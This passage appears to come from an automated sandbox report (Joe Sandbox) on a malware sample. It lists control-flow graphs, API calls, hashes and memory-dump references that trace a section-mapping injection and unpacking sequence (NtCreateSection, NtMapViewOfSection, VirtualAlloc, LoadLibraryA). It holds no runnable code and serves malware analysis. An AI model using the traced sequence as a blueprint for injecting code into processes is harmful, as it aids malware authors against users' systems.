                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 401590-4015c0 92 4015c6-4015e3 call 40120e 85->92 93 4015cd 85->93 97 4015e5 92->97 98 4015e8-4015ed 92->98 93->92 97->98 100 401913-40191b 98->100 101 4015f3-401604 98->101 100->98 106 401920-401966 call 40120e 100->106 104 401911 101->104 105 40160a-401633 101->105 104->106 105->104 113 401639-401650 NtDuplicateObject 105->113 113->104 115 401656-40167a NtCreateSection 113->115 117 4016d6-4016fc NtCreateSection 115->117 118 40167c-40169d NtMapViewOfSection 115->118 117->104 121 401702-401706 117->121 118->117 122 40169f-4016bb NtMapViewOfSection 118->122 121->104 125 40170c-40172d NtMapViewOfSection 121->125 122->117 124 4016bd-4016d3 122->124 124->117 125->104 127 401733-40174f NtMapViewOfSection 125->127 127->104 130 401755 call 40175a 127->130
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 132 40159b-4015c0 137 4015c6-4015e3 call 40120e 132->137 138 4015cd 132->138 142 4015e5 137->142 143 4015e8-4015ed 137->143 138->137 142->143 145 401913-40191b 143->145 146 4015f3-401604 143->146 145->143 151 401920-401966 call 40120e 145->151 149 401911 146->149 150 40160a-401633 146->150 149->151 150->149 158 401639-401650 NtDuplicateObject 150->158 158->149 160 401656-40167a NtCreateSection 158->160 162 4016d6-4016fc NtCreateSection 160->162 163 40167c-40169d NtMapViewOfSection 160->163 162->149 166 401702-401706 162->166 163->162 167 40169f-4016bb NtMapViewOfSection 163->167 166->149 170 40170c-40172d NtMapViewOfSection 166->170 167->162 169 4016bd-4016d3 167->169 169->162 170->149 172 401733-40174f NtMapViewOfSection 170->172 172->149 175 401755 call 40175a 172->175
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 177 4015b0-4015c0 180 4015c6-4015e3 call 40120e 177->180 181 4015cd 177->181 185 4015e5 180->185 186 4015e8-4015ed 180->186 181->180 185->186 188 401913-40191b 186->188 189 4015f3-401604 186->189 188->186 194 401920-401966 call 40120e 188->194 192 401911 189->192 193 40160a-401633 189->193 192->194 193->192 201 401639-401650 NtDuplicateObject 193->201 201->192 203 401656-40167a NtCreateSection 201->203 205 4016d6-4016fc NtCreateSection 203->205 206 40167c-40169d NtMapViewOfSection 203->206 205->192 209 401702-401706 205->209 206->205 210 40169f-4016bb NtMapViewOfSection 206->210 209->192 213 40170c-40172d NtMapViewOfSection 209->213 210->205 212 4016bd-4016d3 210->212 212->205 213->192 215 401733-40174f NtMapViewOfSection 213->215 215->192 218 401755 call 40175a 215->218
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 220 4015bc-4015e3 call 40120e 225 4015e5 220->225 226 4015e8-4015ed 220->226 225->226 228 401913-40191b 226->228 229 4015f3-401604 226->229 228->226 234 401920-401966 call 40120e 228->234 232 401911 229->232 233 40160a-401633 229->233 232->234 233->232 241 401639-401650 NtDuplicateObject 233->241 241->232 243 401656-40167a NtCreateSection 241->243 245 4016d6-4016fc NtCreateSection 243->245 246 40167c-40169d NtMapViewOfSection 243->246 245->232 249 401702-401706 245->249 246->245 250 40169f-4016bb NtMapViewOfSection 246->250 249->232 253 40170c-40172d NtMapViewOfSection 249->253 250->245 252 4016bd-4016d3 250->252 252->245 253->232 255 401733-40174f NtMapViewOfSection 253->255 255->232 258 401755 call 40175a 255->258
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 260 4015cb-4015e3 call 40120e 266 4015e5 260->266 267 4015e8-4015ed 260->267 266->267 269 401913-40191b 267->269 270 4015f3-401604 267->270 269->267 275 401920-401966 call 40120e 269->275 273 401911 270->273 274 40160a-401633 270->274 273->275 274->273 282 401639-401650 NtDuplicateObject 274->282 282->273 284 401656-40167a NtCreateSection 282->284 286 4016d6-4016fc NtCreateSection 284->286 287 40167c-40169d NtMapViewOfSection 284->287 286->273 290 401702-401706 286->290 287->286 291 40169f-4016bb NtMapViewOfSection 287->291 290->273 294 40170c-40172d NtMapViewOfSection 290->294 291->286 293 4016bd-4016d3 291->293 293->286 294->273 296 401733-40174f NtMapViewOfSection 294->296 296->273 299 401755 call 40175a 296->299
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 301 9703e6-9703ff 302 970401-970403 301->302 303 970405 302->303 304 97040a-970416 CreateToolhelp32Snapshot 302->304 303->304 305 970426-970433 Module32First 304->305 306 970418-97041e 304->306 307 970435-970436 call 9700a5 305->307 308 97043c-970444 305->308 306->305 311 970420-970424 306->311 312 97043b 307->312 311->302 311->305 312->308
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0097040E
                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0097042E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, Offset: 00969000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_969000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d45970115322ae61ee12b3215427e4b6d757d5df89be53804ed0120387782e08
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F06233600711ABE7203BB5988DB6B76ECBFD9725F104568E64AA10D0EA70E8458A61
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 317 4029ba-4029c3 318 4029d3 317->318 319 4029ca-4029cf 317->319 318->319 320 4029d6-402a0b call 40120e 318->320 319->320 329 402a0f-402a1d LdrLoadDll 320->329 330 402a26-402a71 call 40120e 329->330 331 402a1f 329->331 331->330
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 248003c-2480047 1 2480049 0->1 2 248004c-2480263 call 2480a3f call 2480e0f call 2480d90 VirtualAlloc 0->2 1->2 17 248028b-2480292 2->17 18 2480265-2480289 call 2480a69 2->18 19 24802a1-24802b0 17->19 21 24802ce-24803c2 VirtualProtect call 2480cce call 2480ce7 18->21 19->21 22 24802b2-24802cc 19->22 29 24803d1-24803e0 21->29 22->19 30 2480439-24804b8 VirtualFree 29->30 31 24803e2-2480437 call 2480ce7 29->31 33 24804be-24804cd 30->33 34 24805f4-24805fe 30->34 31->29 38 24804d3-24804dd 33->38 35 248077f-2480789 34->35 36 2480604-248060d 34->36 40 248078b-24807a3 35->40 41 24807a6-24807b0 35->41 36->35 42 2480613-2480637 36->42 38->34 39 24804e3-2480505 38->39 51 2480517-2480520 39->51 52 2480507-2480515 39->52 40->41 44 248086e-24808be LoadLibraryA 41->44 45 24807b6-24807cb 41->45 46 248063e-2480648 42->46 50 24808c7-24808f9 44->50 48 24807d2-24807d5 45->48 46->35 49 248064e-248065a 46->49 53 2480824-2480833 48->53 54 24807d7-24807e0 48->54 49->35 55 2480660-248066a 49->55 56 24808fb-2480901 50->56 57 2480902-248091d 50->57 58 2480526-2480547 51->58 52->58 62 2480839-248083c 53->62 59 24807e2 54->59 60 24807e4-2480822 54->60 61 248067a-2480689 55->61 56->57 63 248054d-2480550 58->63 59->53 60->48 64 248068f-24806b2 61->64 65 2480750-248077a 61->65 62->44 66 248083e-2480847 62->66 68 24805e0-24805ef 63->68 69 2480556-248056b 63->69 70 24806ef-24806fc 64->70 71 24806b4-24806ed 64->71 65->46 72 2480849 66->72 73 248084b-248086c 66->73 68->38 74 248056d 69->74 75 248056f-248057a 69->75 76 248074b 70->76 77 24806fe-2480748 70->77 71->70 72->44 73->62 74->68 78 248059b-24805bb 75->78 79 248057c-2480599 75->79 76->61 77->76 84 24805bd-24805db 78->84 79->84 84->63
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0248024D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2480000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 314 2480e0f-2480e24 SetErrorMode * 2 315 2480e2b-2480e2c 314->315 316 2480e26 314->316 316->315
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02480223,?,?), ref: 02480E19
                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2480000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 343 4029c5-402a0b call 40120e 354 402a0f-402a1d LdrLoadDll 343->354 355 402a26-402a71 call 40120e 354->355 356 402a1f 354->356 356->355
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
